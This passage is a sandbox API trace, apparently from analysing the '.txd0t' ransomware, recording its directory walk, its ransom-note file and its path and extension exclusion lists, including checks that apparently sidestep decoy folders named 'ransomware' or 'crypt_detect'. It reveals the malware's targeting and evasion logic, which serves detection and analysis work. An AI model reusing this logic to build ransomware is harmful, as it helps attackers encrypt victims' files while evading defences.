psz1="C:\\588bce7c90097ed212\\1043\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" [0116.306] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.306] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.306] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.307] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.307] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.307] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.307] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.307] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.307] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.307] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.307] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.307] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0116.307] GetProcessHeap () returned 0xe30000 [0116.307] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.307] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0116.307] StrCmpW (psz1="1044", psz2=".") returned 1 [0116.307] StrCmpW (psz1="1044", psz2="..") returned 1 [0116.307] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.307] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.307] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1044", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system32\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\local\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\boot\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\perflogs\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\programdata\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\drivers\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\wsus\\") returned 0x0 [0116.307] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="crypt_detect") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="cryptolocker") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="ransomware") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\WINDOWS") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.308] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files") returned 0x0 [0116.308] GetProcessHeap () returned 0xe30000 [0116.308] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.308] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.308] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\*") returned="C:\\588bce7c90097ed212\\1044\\*" [0116.308] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0116.308] StrCmpW (psz1=".", psz2=".") returned 0 [0116.308] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.308] StrCmpW (psz1="..", psz2=".") returned 1 [0116.308] StrCmpW (psz1="..", psz2="..") returned 0 [0116.308] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x585e874b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x585e874b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587835ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.308] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.308] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.308] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.308] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0116.308] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt" [0116.308] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.308] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.308] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.309] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.309] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.309] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.309] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.309] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t" [0116.309] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.309] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.309] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x586787e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x137c0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.309] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.309] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.309] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t" [0116.309] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.309] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.309] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.309] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.309] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.309] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0116.309] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" [0116.309] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.309] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.309] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.309] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.309] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.310] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.310] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.310] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.310] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.310] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0116.310] GetProcessHeap () returned 0xe30000 [0116.310] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.310] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0116.310] StrCmpW (psz1="1045", psz2=".") returned 1 [0116.310] StrCmpW (psz1="1045", psz2="..") returned 1 [0116.310] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.310] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.310] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1045", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.310] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system32\\") returned 0x0 [0116.310] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.310] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system\\") returned 0x0 [0116.310] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.310] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\local\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\boot\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\perflogs\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\programdata\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\drivers\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\wsus\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="crypt_detect") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="cryptolocker") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="ransomware") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\WINDOWS") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.311] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files") returned 0x0 [0116.311] GetProcessHeap () returned 0xe30000 [0116.311] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.311] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.311] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\*") returned="C:\\588bce7c90097ed212\\1045\\*" [0116.311] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0116.312] StrCmpW (psz1=".", psz2=".") returned 0 [0116.312] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.312] StrCmpW (psz1="..", psz2=".") returned 1 [0116.312] StrCmpW (psz1="..", psz2="..") returned 0 [0116.312] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5875d2e7, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5875d2e7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587835ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.312] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.312] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.312] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.312] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0116.312] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt" [0116.312] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.312] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.312] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.313] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.313] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, 